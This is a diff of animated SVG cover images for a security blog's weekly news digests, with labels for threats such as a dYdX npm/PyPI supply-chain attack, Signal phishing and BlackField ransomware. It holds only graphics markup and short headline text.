+  <line x1="120" y1="490" x2="1080" y2="490" stroke="#2AA8CE" stroke-width="18" stroke-linecap="round" opacity="0.22" filter="url(#glowCyan)">
+    <animate attributeName="opacity" values="0.18;0.38;0.18" dur="4.5s" repeatCount="indefinite"/>
+  </line>
+  <line x1="120" y1="490" x2="1080" y2="490" stroke="#2AA8CE" stroke-width="9" stroke-linecap="round"/>
+
+  <g transform="translate(62,490)" filter="url(#textShadow)">
+    <rect x="-16" y="-16" width="52" height="32" rx="7" fill="#2AA8CE">
+      <animate attributeName="fill" values="#2AA8CE;#5FD3F3;#2AA8CE" dur="5s" repeatCount="indefinite"/>
+    </rect>
+    <text x="10" y="7" font-family="Helvetica, Arial, sans-serif" font-size="17" font-weight="900" fill="#FFFFFF" text-anchor="middle">L3</text>
+  </g>
+
+  <circle r="9" fill="#CCF0FA" stroke="#FFFFFF" stroke-width="2.5">
+    <animate attributeName="cx" values="140;1080;140" dur="12s" repeatCount="indefinite"/>
+    <animate attributeName="cy" values="490;490;490" dur="12s" repeatCount="indefinite"/>
+    <animate attributeName="opacity" values="0;1;1;1;0" dur="12s" repeatCount="indefinite"/>
+  </circle>
+
+  <!-- Station 3A -->
+  <g transform="translate(200,490)">
+    <circle r="22" fill="url(#pulseCyan)">
+      <animate attributeName="r" values="22;32;22" dur="3.2s" repeatCount="indefinite"/>
+      <animate attributeName="opacity" values="0.55;0.9;0.55" dur="3.2s" repeatCount="indefinite"/>
+    </circle>
+    <circle r="13" fill="#080E1E" stroke="#2AA8CE" stroke-width="4.5" filter="url(#stationShadow)"/>
+    <circle r="4.5" fill="#5FD3F3">
+      <animate attributeName="opacity" values="1;0.3;1" dur="1.8s" repeatCount="indefinite"/>
+    </circle>
+  </g>
+  <g filter="url(#textShadow)">
+    <text x="200" y="453" font-family="Helvetica, Arial, sans-serif" font-size="15" font-weight="900" fill="#CCF0FA" text-anchor="middle">dYdX Attack</text>
+    <text x="200" y="470" font-family="Helvetica, Arial, sans-serif" font-size="11" font-weight="600" fill="#8FD8EE" text-anchor="middle">npm / PyPI</text>
+    <text x="200" y="530" font-family="Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#2AA8CE" text-anchor="middle">Supply Chain</text>
+  </g>
+
+  <!-- Station 3B -->
+  <g transform="translate(400,490)">
+    <circle r="13" fill="#080E1E" stroke="#2AA8CE" stroke-width="4" filter="url(#stationShadow)"/>
+    <circle r="5" fill="#5FD3F3">
+      <animate attributeName="opacity" values="0.5;1;0.5" dur="2.2s" repeatCount="indefinite"/>
+      <animate attributeName="r" values="5;7;5" dur="2.2s" repeatCount="indefinite"/>
+    </circle>
+  </g>
+  <g filter="url(#textShadow)">
+    <text x="400" y="453" font-family="Helvetica, Arial, sans-serif" font-size="14" font-weight="800" fill="#CCF0FA" text-anchor="middle">Malicious Pkg</text>
+    <text x="400" y="470" font-family="Helvetica, Arial, sans-serif" font-size="11" font-weight="600" fill="#8FD8EE" text-anchor="middle">Trojanized</text>
+    <text x="400" y="530" font-family="Helvetica, Arial, sans-serif" font-size="11" font-weight="600" fill="#1A7A9A" text-anchor="middle">T1195.001</text>
+  </g>
+
+  <!-- Station 3C -->
+  <g transform="translate(610,490)">
+    <circle r="13" fill="#080E1E" stroke="#2AA8CE" stroke-width="4" filter="url(#stationShadow)"/>
+    <circle r="5" fill="#2AA8CE">
+      <animate attributeName="opacity" values="0.5;1;0.5" dur="2s" repeatCount="indefinite"/>
+    </circle>
+  </g>
+  <g filter="url(#textShadow)">
+    <text x="610" y="453" font-family="Helvetica, Arial, sans-serif" font-size="14" font-weight="800" fill="#CCF0FA" text-anchor="middle">Wallet Drain</text>
+    <text x="610" y="470" font-family="Helvetica, Arial, sans-serif" font-size="11" font-weight="600" fill="#8FD8EE" text-anchor="middle">Crypto Theft</text>
+    <text x="610" y="530" font-family="Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#2AA8CE" text-anchor="middle">HIGH</text>
+  </g>
+
+  <!-- Station 3D -->
+  <g transform="translate(820,490)">
+    <circle r="13" fill="#080E1E" stroke="#2AA8CE" stroke-width="4" filter="url(#stationShadow)"/>
+    <circle r="5" fill="#2AA8CE">
+      <animate attributeName="opacity" values="0.5;1;0.5" dur="2.4s" repeatCount="indefinite"/>
+    </circle>
+  </g>
+  <g filter="url(#textShadow)">
+    <text x="820" y="453" font-family="Helvetica, Arial, sans-serif" font-size="14" font-weight="800" fill="#CCF0FA" text-anchor="middle">Dev Env</text>
+    <text x="820" y="470" font-family="Helvetica, Arial, sans-serif" font-size="11" font-weight="600" fill="#8FD8EE" text-anchor="middle">Compromised</text>
+    <text x="820" y="530" font-family="Helvetica, Arial, sans-serif" font-size="11" font-weight="600" fill="#1A7A9A" text-anchor="middle">T1608.001</text>
+  </g>
+
+  <!-- Station 3E -->
+  <g transform="translate(1040,490)">
+    <circle r="13" fill="#080E1E" stroke="#1A7A9A" stroke-width="4" filter="url(#stationShadow)"/>
+    <circle r="5" fill="#2AA8CE">
+      <animate attributeName="opacity" values="0.5;1;0.5" dur="2.8s" repeatCount="indefinite"/>
+    </circle>
+  </g>
+  <g filter="url(#textShadow)">
+    <text x="1040" y="453" font-family="Helvetica, Arial, sans-serif" font-size="14" font-weight="800" fill="#CCF0FA" text-anchor="middle">SBOM Check</text>
+    <text x="1040" y="470" font-family="Helvetica, Arial, sans-serif" font-size="11" font-weight="600" fill="#8FD8EE" text-anchor="middle">Verify Pkgs</text>
+    <text x="1040" y="530" font-family="Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#2AA8CE" text-anchor="middle">Defend</text>
+  </g>
+</g>
+
+<!-- Footer bar -->
+<rect x="0" y="598" width="1200" height="32" fill="#0A1430" opacity="0.9"/>
+<text x="60" y="618" font-family="Helvetica, Arial, sans-serif" font-size="11" font-weight="600" fill="#4A6AA0">L1: APT TGR-STA-1030 (Critical)   L2: DKnife AitM Router Attack (High)   L3: dYdX Supply Chain npm/PyPI (High)</text>
+<text x="1140" y="618" font-family="Helvetica, Arial, sans-serif" font-size="11" font-weight="600" fill="#4A6AA0" text-anchor="end">tech.2twodragon.com</text>
+
+<!-- cover-qr: https://tech.2twodragon.com/posts/2026/02/07/Tech_Security_Weekly_Digest_AI_Malware_Go_Security/ : 41x41 -->
+<g transform="translate(1080,504)" filter="url(#softShadow)">
+  <rect x="-8" y="-8" width="100" height="100" rx="6" fill="#FFFFFF"/>
+  <g transform="scale(2.048780)" fill="#0A1020">
+    <path d="M0 0h7v1h-7zM10 0h4v1h-4zM18 0h3v1h-3zM22 0h1v1h-1zM28 0h1v1h-1zM30 0h3v1h-3zM34 0h7v1h-7zM0 1h1v1h-1zM6 1h1v1h-1zM9 1h7v1h-7zM18 1h1v1h-1zM20 1h1v1h-1zM22 1h1v1h-1zM24 1h1v1h-1zM26 1h2v1h-2zM32 1h1v1h-1zM34 1h1v1h-1zM40 1h1v1h-1zM0 2h1v1h-1zM2 2h3v1h-3zM6 2h1v1h-1zM8 2h3v1h-3zM16 2h1v1h-1zM20 2h1v1h-1zM27 2h2v1h-2zM32 2h1v1h-1zM34 2h1v1h-1zM36 2h3v1h-3zM40 2h1v1h-1zM0 3h1v1h-1zM2 3h3v1h-3zM6 3h1v1h-1zM8 3h3v1h-3zM18 3h5v1h-5zM25 3h5v1h-5zM32 3h1v1h-1zM34 3h1v1h-1zM36 3h3v1h-3zM40 3h1v1h-1zM0 4h1v1h-1zM2 4h3v1h-3zM6 4h1v1h-1zM8 4h1v1h-1zM10 4h1v1h-1zM12 4h1v1h-1zM14 4h4v1h-4zM20 4h2v1h-2zM26 4h1v1h-1zM30 4h2v1h-2zM34 4h1v1h-1zM36 4h3v1h-3zM40 4h1v1h-1zM0 5h1v1h-1zM6 5h1v1h-1zM8 5h1v1h-1zM10 5h1v1h-1zM12 5h2v1h-2zM15 5h1v1h-1zM17 5h1v1h-1zM20 5h1v1h-1zM25 5h1v1h-1zM27 5h1v1h-1zM34 5h1v1h-1zM40 5h1v1h-1zM0 6h7v1h-7zM8 6h1v1h-1zM10 6h1v1h-1zM12 6h1v1h-1zM14 6h1v1h-1zM16 6h1v1h-1zM18 6h1v1h-1zM20 6h1v1h-1zM22 6h1v1h-1zM24 6h1v1h-1zM26 6h1v1h-1zM28 6h1v1h-1zM30 6h1v1h-1zM32 6h1v1h-1zM34 6h7v1h-7zM8 7h2v1h-2zM11 7h1v1h-1zM13 7h3v1h-3zM18 7h4v1h-4zM23 7h1v1h-1zM27 7h1v1h-1zM30 7h2v1h-2zM0 8h1v1h-1zM2 8h5v1h-5zM9 8h1v1h-1zM11 8h1v1h-1zM15 8h1v1h-1zM17 8h1v1h-1zM19 8h1v1h-1zM22 8h2v1h-2zM25 8h5v1h-5zM32 8h1v1h-1zM34 8h5v1h-5zM4 9h2v1h-2zM7 9h1v1h-1zM10 9h2v1h-2zM16 9h1v1h-1zM18 9h2v1h-2zM21 9h1v1h-1zM23 9h1v1h-1zM26 9h1v1h-1zM30 9h3v1h-3zM35 9h2v1h-2zM38 9h1v1h-1zM40 9h1v1h-1zM2 10h1v1h-1zM6 10h2v1h-2zM12 10h2v1h-2zM15 10h1v1h-1zM17 10h2v1h-2zM21 10h2v1h-2zM24 10h2v1h-2zM27 10h1v1h-1zM30 10h1v1h-1zM32 10h1v1h-1zM35 10h2v1h-2zM5 11h1v1h-1zM8 11h3v1h-3zM12 11h1v1h-1zM16 11h1v1h-1zM19 11h3v1h-3zM28 11h1v1h-1zM30 11h3v1h-3zM34 11h1v1h-1zM37 11h1v1h-1zM2 12h1v1h-1zM4 12h1v1h-1zM6 12h1v1h-1zM8 12h1v1h-1zM10 12h1v1h-1zM13 12h5v1h-5zM19 12h1v1h-1zM22 12h1v1h-1zM25 12h1v1h-1zM28 12h4v1h-4zM35 12h1v1h-1zM37 12h3v1h-3zM0 13h4v1h-4zM5 13h1v1h-1zM7 13h2v1h-2zM11 13h2v1h-2zM15 13h1v1h-1zM18 13h1v1h-1zM20 13h1v1h-1zM24 13h2v1h-2zM28 13h2v1h-2zM31 13h8v1h-8zM40 13h1v1h-1zM1 14h1v1h-1zM4 14h1v1h-1zM6 14h2v1h-2zM13 14h4v1h-4zM18 14h2v1h-2zM22 14h1v1h-1zM27 14h4v1h-4zM32 14h2v1h-2zM35 14h1v1h-1zM37 14h2v1h-2zM0 15h1v1h-1zM2 15h2v1h-2zM7 15h1v1h-1zM9 15h1v1h-1zM13 15h1v1h-1zM19 15h4v1h-4zM24 15h1v1h-1zM26 15h2v1h-2zM31 15h1v1h-1zM34 15h1v1h-1zM36 15h2v1h-2zM1 16h3v1h-3zM6 16h4v1h-4zM11 16h2v1h-2zM15 16h1v1h-1zM17 16h1v1h-1zM19 16h1v1h-1zM21 16h2v1h-2zM25 16h2v1h-2zM29 16h1v1h-1zM33 16h1v1h-1zM35 16h1v1h-1zM37 16h2v1h-2zM0 17h1v1h-1zM2 17h1v1h-1zM4 17h2v1h-2zM9 17h1v1h-1zM14 17h2v1h-2zM17 17h2v1h-2zM20 17h2v1h-2zM23 17h1v1h-1zM25 17h1v1h-1zM27 17h2v1h-2zM30 17h3v1h-3zM34 17h3v1h-3zM39 17h2v1h-2zM0 18h1v1h-1zM3 18h1v1h-1zM5 18h2v1h-2zM9 18h3v1h-3zM17 18h1v1h-1zM20 18h2v1h-2zM27 18h4v1h-4zM32 18h1v1h-1zM36 18h1v1h-1zM38 18h2v1h-2zM2 19h1v1h-1zM5 19h1v1h-1zM7 19h4v1h-4zM12 19h1v1h-1zM14 19h2v1h-2zM17 19h8v1h-8zM26 19h1v1h-1zM28 19h1v1h-1zM32 19h2v1h-2zM36 19h2v1h-2zM1 20h2v1h-2zM6 20h2v1h-2zM9 20h1v1h-1zM12 20h5v1h-5zM19 20h3v1h-3zM24 20h2v1h-2zM28 20h2v1h-2zM32 20h1v1h-1zM36 20h1v1h-1zM38 20h1v1h-1zM40 20h1v1h-1zM0 21h2v1h-2zM4 21h1v1h-1zM7 21h4v1h-4zM14 21h3v1h-3zM18 21h1v1h-1zM20 21h5v1h-5zM31 21h1v1h-1zM34 21h3v1h-3zM39 21h2v1h-2zM0 22h2v1h-2zM3 22h2v1h-2zM6 22h8v1h-8zM16 22h3v1h-3zM21 22h1v1h-1zM26 22h3v1h-3zM32 22h1v1h-1zM34 22h2v1h-2zM38 22h1v1h-1zM1 23h1v1h-1zM3 23h2v1h-2zM7 23h1v1h-1zM9 23h1v1h-1zM12 23h1v1h-1zM14 23h1v1h-1zM16 23h1v1h-1zM21 23h3v1h-3zM28 23h1v1h-1zM31 23h2v1h-2zM34 23h2v1h-2zM37 23h1v1h-1zM39 23h1v1h-1zM0 24h1v1h-1zM3 24h1v1h-1zM5 24h2v1h-2zM8 24h4v1h-4zM13 24h1v1h-1zM17 24h1v1h-1zM19 24h1v1h-1zM22 24h1v1h-1zM24 24h3v1h-3zM29 24h1v1h-1zM31 24h1v1h-1zM35 24h1v1h-1zM38 24h2v1h-2zM0 25h4v1h-4zM8 25h1v1h-1zM10 25h2v1h-2zM13 25h3v1h-3zM18 25h4v1h-4zM23 25h1v1h-1zM25 25h2v1h-2zM30 25h2v1h-2zM35 25h3v1h-3zM39 25h2v1h-2zM1 26h1v1h-1zM3 26h4v1h-4zM8 26h1v1h-1zM11 26h2v1h-2zM15 26h1v1h-1zM20 26h3v1h-3zM25 26h3v1h-3zM29 26h2v1h-2zM32 26h1v1h-1zM34 26h1v1h-1zM36 26h1v1h-1zM0 27h1v1h-1zM7 27h2v1h-2zM11 27h1v1h-1zM13 27h2v1h-2zM19 27h5v1h-5zM26 27h2v1h-2zM30 27h3v1h-3zM34 27h4v1h-4zM40 27h1v1h-1zM1 28h1v1h-1zM3 28h1v1h-1zM6 28h4v1h-4zM13 28h1v1h-1zM16 28h2v1h-2zM19 28h2v1h-2zM22 28h4v1h-4zM29 28h4v1h-4zM35 28h1v1h-1zM37 28h2v1h-2zM0 29h1v1h-1zM3 29h1v1h-1zM9 29h1v1h-1zM16 29h3v1h-3zM21 29h1v1h-1zM26 29h1v1h-1zM28 29h2v1h-2zM32 29h1v1h-1zM35 29h2v1h-2zM40 29h1v1h-1zM0 30h1v1h-1zM4 30h3v1h-3zM8 30h1v1h-1zM12 30h1v1h-1zM15 30h1v1h-1zM20 30h2v1h-2zM23 30h5v1h-5zM32 30h4v1h-4zM0 31h1v1h-1zM4 31h2v1h-2zM7 31h1v1h-1zM10 31h2v1h-2zM18 31h1v1h-1zM21 31h3v1h-3zM26 31h1v1h-1zM30 31h6v1h-6zM37 31h1v1h-1zM40 31h1v1h-1zM0 32h1v1h-1zM2 32h2v1h-2zM6 32h1v1h-1zM9 32h4v1h-4zM17 32h1v1h-1zM20 32h4v1h-4zM25 32h5v1h-5zM31 32h6v1h-6zM38 32h2v1h-2zM8 33h1v1h-1zM10 33h2v1h-2zM13 33h2v1h-2zM16 33h1v1h-1zM20 33h1v1h-1zM23 33h1v1h-1zM25 33h1v1h-1zM27 33h2v1h-2zM32 33h1v1h-1zM36 33h1v1h-1zM38 33h3v1h-3zM0 34h7v1h-7zM12 34h1v1h-1zM18 34h1v1h-1zM20 34h1v1h-1zM22 34h1v1h-1zM25 34h4v1h-4zM31 34h2v1h-2zM34 34h1v1h-1zM36 34h2v1h-2zM0 35h1v1h-1zM6 35h1v1h-1zM8 35h1v1h-1zM10 35h1v1h-1zM12 35h1v1h-1zM14 35h2v1h-2zM26 35h2v1h-2zM31 35h2v1h-2zM36 35h2v1h-2zM40 35h1v1h-1zM0 36h1v1h-1zM2 36h3v1h-3zM6 36h1v1h-1zM8 36h3v1h-3zM12 36h2v1h-2zM15 36h2v1h-2zM18 36h2v1h-2zM21 36h2v1h-2zM29 36h1v1h-1zM32 36h7v1h-7zM40 36h1v1h-1zM0 37h1v1h-1zM2 37h3v1h-3zM6 37h1v1h-1zM8 37h1v1h-1zM10 37h2v1h-2zM14 37h1v1h-1zM17 37h1v1h-1zM19 37h3v1h-3zM23 37h2v1h-2zM31 37h3v1h-3zM35 37h1v1h-1zM37 37h1v1h-1zM39 37h2v1h-2zM0 38h1v1h-1zM2 38h3v1h-3zM6 38h1v1h-1zM8 38h2v1h-2zM14 38h2v1h-2zM20 38h1v1h-1zM22 38h1v1h-1zM24 38h4v1h-4zM29 38h3v1h-3zM33 38h5v1h-5zM0 39h1v1h-1zM6 39h1v1h-1zM10 39h1v1h-1zM13 39h2v1h-2zM17 39h3v1h-3zM21 39h2v1h-2zM24 39h1v1h-1zM26 39h1v1h-1zM28 39h1v1h-1zM32 39h2v1h-2zM36 39h2v1h-2zM39 39h1v1h-1zM0 40h7v1h-7zM8 40h1v1h-1zM11 40h4v1h-4zM16 40h3v1h-3zM22 40h1v1h-1zM24 40h4v1h-4zM29 40h1v1h-1zM34 40h4v1h-4z"/>
+  </g>
+</g>
+<text x="1122" y="614" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="700" fill="#F5F7FA" text-anchor="middle">scan / full post</text>
 </svg>

--- a/assets/images/2026-02-08-Tech_Security_Weekly_Digest_AI_Ransomware_Data.svg
+++ b/assets/images/2026-02-08-Tech_Security_Weekly_Digest_AI_Ransomware_Data.svg
@@ -1,134 +1,338 @@
-<svg xmlns="http://www.w3.org/2000/svg" width="1200" height="630" viewBox="0 0 1200 630">
-  <title>Security Weekly Digest - February 08, 2026</title>
-  <defs>
-    <linearGradient id="bg" x1="0%" y1="0%" x2="100%" y2="100%">
-      <stop offset="0%" stop-color="#0a0e1a"/>
-      <stop offset="60%" stop-color="#0f1628"/>
-      <stop offset="100%" stop-color="#141b2d"/>
-    </linearGradient>
-    <linearGradient id="hg" x1="0%" y1="0%" x2="100%" y2="0%">
-      <stop offset="0%" stop-color="#1e293b"/>
-      <stop offset="100%" stop-color="#0f172a"/>
-    </linearGradient>
-    <filter id="glow" x="-50%" y="-50%" width="200%" height="200%">
-      <feGaussianBlur stdDeviation="18"/>
-    </filter>
-    <marker id="ar" markerWidth="8" markerHeight="8" refX="4" refY="4" orient="auto">
-      <path d="M0,0 L8,4 L0,8 Z" fill="#ef4444" opacity="0.7"/>
-    </marker>
-  </defs>
+<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1200 630" width="1200" height="630" role="img" aria-label="Research-based weekly digest cover: Russia-linked Signal phishing targets politicians and journalists, BlackField ransomware reuses LockBit and Conti code, Vertical AI for cybersecurity domain, Zero Trust data-centric security strategy">
+<!-- profile: high-quality-cover (L13 Callouts, research-based, batch1-locked) -->
+<title>Weekly digest 2026-02-08: Signal Phishing (BfV/BSI), BlackField Ransomware, Vertical AI Security, Zero Trust Data</title>
+<defs>
+  <linearGradient id="bgSpread" x1="0%" y1="0%" x2="100%" y2="100%">
+    <stop offset="0%" stop-color="#080E20"/>
+    <stop offset="55%" stop-color="#0B1228"/>
+    <stop offset="100%" stop-color="#100C30"/>
+  </linearGradient>
+  <linearGradient id="cardA" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#2C0A12"/>
+    <stop offset="100%" stop-color="#1C0610"/>
+  </linearGradient>
+  <linearGradient id="cardB" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#2A1A06"/>
+    <stop offset="100%" stop-color="#1C1004"/>
+  </linearGradient>
+  <linearGradient id="cardC" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#0A1E3C"/>
+    <stop offset="100%" stop-color="#071530"/>
+  </linearGradient>
+  <linearGradient id="cardD" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#0E1E38"/>
+    <stop offset="100%" stop-color="#081830"/>
+  </linearGradient>
+  <linearGradient id="ransomGrad" x1="0%" y1="0%" x2="100%" y2="100%">
+    <stop offset="0%" stop-color="#F59E0B"/>
+    <stop offset="100%" stop-color="#92400E"/>
+  </linearGradient>
+  <radialGradient id="glowRed" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#E63946" stop-opacity="0.55"/>
+    <stop offset="100%" stop-color="#E63946" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="glowAmber" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#F59E0B" stop-opacity="0.5"/>
+    <stop offset="100%" stop-color="#F59E0B" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="glowBlue" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#3B82F6" stop-opacity="0.5"/>
+    <stop offset="100%" stop-color="#3B82F6" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="glowGreen" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#10B981" stop-opacity="0.5"/>
+    <stop offset="100%" stop-color="#10B981" stop-opacity="0"/>
+  </radialGradient>
+  <pattern id="dotGrid" x="0" y="0" width="40" height="40" patternUnits="userSpaceOnUse">
+    <circle cx="20" cy="20" r="0.8" fill="#2A3256" opacity="0.5"/>
+  </pattern>
+  <filter id="softShadow" x="-10%" y="-10%" width="130%" height="130%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="2.5"/>
+    <feOffset dx="1" dy="3"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.5"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+  <filter id="textShadow" x="-5%" y="-5%" width="110%" height="110%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="1.2"/>
+    <feOffset dx="0" dy="1.5"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.75"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+</defs>
 
-  <rect width="1200" height="630" fill="url(#bg)"/>
+<!-- Background -->
+<rect width="1200" height="630" fill="url(#bgSpread)"/>
+<rect width="1200" height="630" fill="url(#dotGrid)"/>
 
-  <!-- Grid -->
-  <g opacity="0.04" stroke="#94a3b8" stroke-width="0.5">
-    <line x1="0" y1="105" x2="1200" y2="105"/><line x1="0" y1="210" x2="1200" y2="210"/>
-    <line x1="0" y1="315" x2="1200" y2="315"/><line x1="0" y1="420" x2="1200" y2="420"/>
-    <line x1="0" y1="525" x2="1200" y2="525"/>
-    <line x1="240" y1="0" x2="240" y2="630"/><line x1="480" y1="0" x2="480" y2="630"/>
-    <line x1="720" y1="0" x2="720" y2="630"/><line x1="960" y1="0" x2="960" y2="630"/>
+<!-- Ambient glows -->
+<circle cx="300" cy="230" r="130" fill="url(#glowRed)">
+  <animate attributeName="opacity" values="0.5;0.9;0.5" dur="6.2s" repeatCount="indefinite"/>
+</circle>
+<circle cx="900" cy="230" r="130" fill="url(#glowAmber)">
+  <animate attributeName="opacity" values="0.45;0.85;0.45" dur="5.4s" repeatCount="indefinite"/>
+</circle>
+<circle cx="300" cy="480" r="120" fill="url(#glowBlue)">
+  <animate attributeName="opacity" values="0.4;0.75;0.4" dur="7.0s" repeatCount="indefinite"/>
+</circle>
+<circle cx="900" cy="480" r="120" fill="url(#glowGreen)">
+  <animate attributeName="opacity" values="0.45;0.8;0.45" dur="6.4s" repeatCount="indefinite"/>
+</circle>
+
+<!-- Header bar -->
+<rect x="0" y="0" width="1200" height="56" fill="#040912" opacity="0.93"/>
+<text x="36" y="36" font-family="Inter, Helvetica, Arial, sans-serif" font-size="18" font-weight="700" fill="#8FB8FF" letter-spacing="2.5">WEEKLY DIGEST</text>
+<text x="1164" y="36" font-family="Inter, Helvetica, Arial, sans-serif" font-size="15" font-weight="600" fill="#7DA3D9" letter-spacing="1.5" text-anchor="end">2026.02.08</text>
+<rect x="0" y="54" width="1200" height="2" fill="#E63946" opacity="0.85">
+  <animate attributeName="opacity" values="0.4;1;0.4" dur="4.6s" repeatCount="indefinite"/>
+</rect>
+
+<!-- CARD 01: Signal Phishing — CRITICAL / Nation-State (top-left) -->
+<g transform="translate(32,80)">
+  <rect x="0" y="0" width="564" height="248" rx="14" fill="url(#cardA)" stroke="#E63946" stroke-width="1.6" opacity="0.97"/>
+  <rect x="0" y="0" width="6" height="248" rx="2" fill="#E63946"/>
+  <rect x="0" y="0" width="564" height="4" fill="#E63946" opacity="0.65"/>
+  <g transform="translate(20,18)">
+    <rect x="0" y="0" width="40" height="40" rx="6" fill="#E63946" opacity="0.22"/>
+    <text x="20" y="28" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="22" font-weight="900" fill="#F87171">01</text>
   </g>
-
-  <!-- Glow orbs -->
-  <circle cx="200" cy="300" r="200" fill="#ef4444" opacity="0.06" filter="url(#glow)"/>
-  <circle cx="600" cy="350" r="180" fill="#f59e0b" opacity="0.05" filter="url(#glow)"/>
-  <circle cx="1000" cy="300" r="180" fill="#3b82f6" opacity="0.06" filter="url(#glow)"/>
-
-  <!-- Header -->
-  <rect x="0" y="0" width="1200" height="80" fill="url(#hg)" opacity="0.9"/>
-  <rect x="0" y="78" width="1200" height="2" fill="#334155" opacity="0.8"/>
-  <g transform="translate(48,40)">
-    <path d="M0,-22 L18,-12 L18,3 C18,13 10,20 0,24 C-10,20 -18,13 -18,3 L-18,-12 Z" fill="#1e3a5f" stroke="#3b82f6" stroke-width="1.5"/>
-    <path d="M-7,1 L-2,6 L8,-5" stroke="#3b82f6" stroke-width="2.5" fill="none" stroke-linecap="round"/>
+  <g filter="url(#textShadow)">
+    <text x="74" y="36" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#F87171" letter-spacing="2.4">CRITICAL  /  NATION-STATE</text>
+    <text x="74" y="57" font-family="Inter, Helvetica, Arial, sans-serif" font-size="21" font-weight="800" fill="#F5F7FA">Signal Phishing — BfV/BSI Alert</text>
   </g>
-  <text x="80" y="44" font-family="Arial,sans-serif" font-size="28" font-weight="700" fill="#f1f5f9">Security Weekly Digest</text>
-  <rect x="990" y="18" width="178" height="44" rx="6" fill="#1e293b" stroke="#334155" stroke-width="1"/>
-  <text x="1079" y="48" font-family="Arial,sans-serif" font-size="15" font-weight="700" fill="#94a3b8" text-anchor="middle">February 08, 2026</text>
-
-  <!-- Card 1: SEC OPS -->
-  <rect x="32" y="100" width="220" height="120" rx="8" fill="#1a0505" stroke="#ef4444" stroke-width="1.5"/>
-  <circle cx="52" cy="120" r="6" fill="#ef4444"/>
-  <g transform="translate(142,148)">
-    <path d="M0,-16 L14,-8 L14,4 C14,12 8,16 0,20 C-8,16 -14,12 -14,4 L-14,-8 Z" fill="none" stroke="#ef4444" stroke-width="1.8"/>
+  <text x="20" y="98" font-family="Inter, Helvetica, Arial, sans-serif" font-size="13" font-weight="500" fill="#FBB6BD">Russia-linked APT targets politicians, military, journalists</text>
+  <!-- Signal app mockup -->
+  <g transform="translate(26,116)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="68" height="108" rx="10" fill="#0D1B2E" stroke="#F87171" stroke-width="1.8"/>
+    <rect x="5" y="10" width="58" height="86" rx="3" fill="#120810"/>
+    <circle cx="34" cy="28" r="12" fill="#2979FF" opacity="0.85"/>
+    <text x="34" y="32" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="900" fill="#FFFFFF">S</text>
+    <rect x="10" y="46" width="34" height="9" rx="4" fill="#3A1018"/>
+    <rect x="14" y="60" width="38" height="9" rx="4" fill="#1A2A3C"/>
+    <rect x="10" y="74" width="30" height="9" rx="4" fill="#3A1018"/>
+    <g stroke="#F87171" stroke-width="2" fill="none" transform="translate(46,80)">
+      <path d="M0 -18 L0 0 Q0 8 -7 8 Q-14 8 -14 0"/>
+      <circle cx="0" cy="-18" r="2" fill="#F87171"/>
+    </g>
+    <circle cx="34" cy="100" r="3" fill="#2A3A56" stroke="#F87171" stroke-width="0.6"/>
   </g>
-  <text x="142" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#ef4444" text-anchor="middle">SEC OPS</text>
-  <!-- Card 2: CLOUD SEC -->
-  <rect x="268" y="100" width="220" height="120" rx="8" fill="#1a0d0d" stroke="#f59e0b" stroke-width="1.5"/>
-  <circle cx="288" cy="120" r="6" fill="#f59e0b"/>
-  <g transform="translate(378,148)">
-    <path d="M-16,8 C-24,8 -26,-2 -20,-8 C-18,-18 -6,-22 4,-18 C8,-26 20,-26 24,-16 C30,-16 32,-8 28,0 C26,8 16,8 8,8 Z" fill="none" stroke="#f59e0b" stroke-width="1.8" transform="scale(0.65)"/>
+  <!-- Target list -->
+  <g transform="translate(120,120)">
+    <circle cx="7" cy="7" r="4" fill="#E63946"/>
+    <text x="20" y="11" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="600" fill="#FBB6BD">Politicians</text>
+    <g transform="translate(0,22)">
+      <circle cx="7" cy="7" r="4" fill="#E63946"/>
+      <text x="20" y="11" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="600" fill="#FBB6BD">Military officers</text>
+    </g>
+    <g transform="translate(0,44)">
+      <circle cx="7" cy="7" r="4" fill="#E63946"/>
+      <text x="20" y="11" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="600" fill="#FBB6BD">Journalists</text>
+    </g>
+    <g transform="translate(0,66)">
+      <circle cx="7" cy="7" r="4" fill="#E63946" opacity="0.6"/>
+      <text x="20" y="11" font-family="Inter, Helvetica, Arial, sans-serif" font-size="11" font-weight="500" fill="#F87171">MITRE T1566 Phishing</text>
+    </g>
   </g>
-  <text x="378" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#f59e0b" text-anchor="middle">CLOUD SEC</text>
-  <!-- Card 3: THREAT INT -->
-  <rect x="504" y="100" width="220" height="120" rx="8" fill="#0a1020" stroke="#3b82f6" stroke-width="1.5"/>
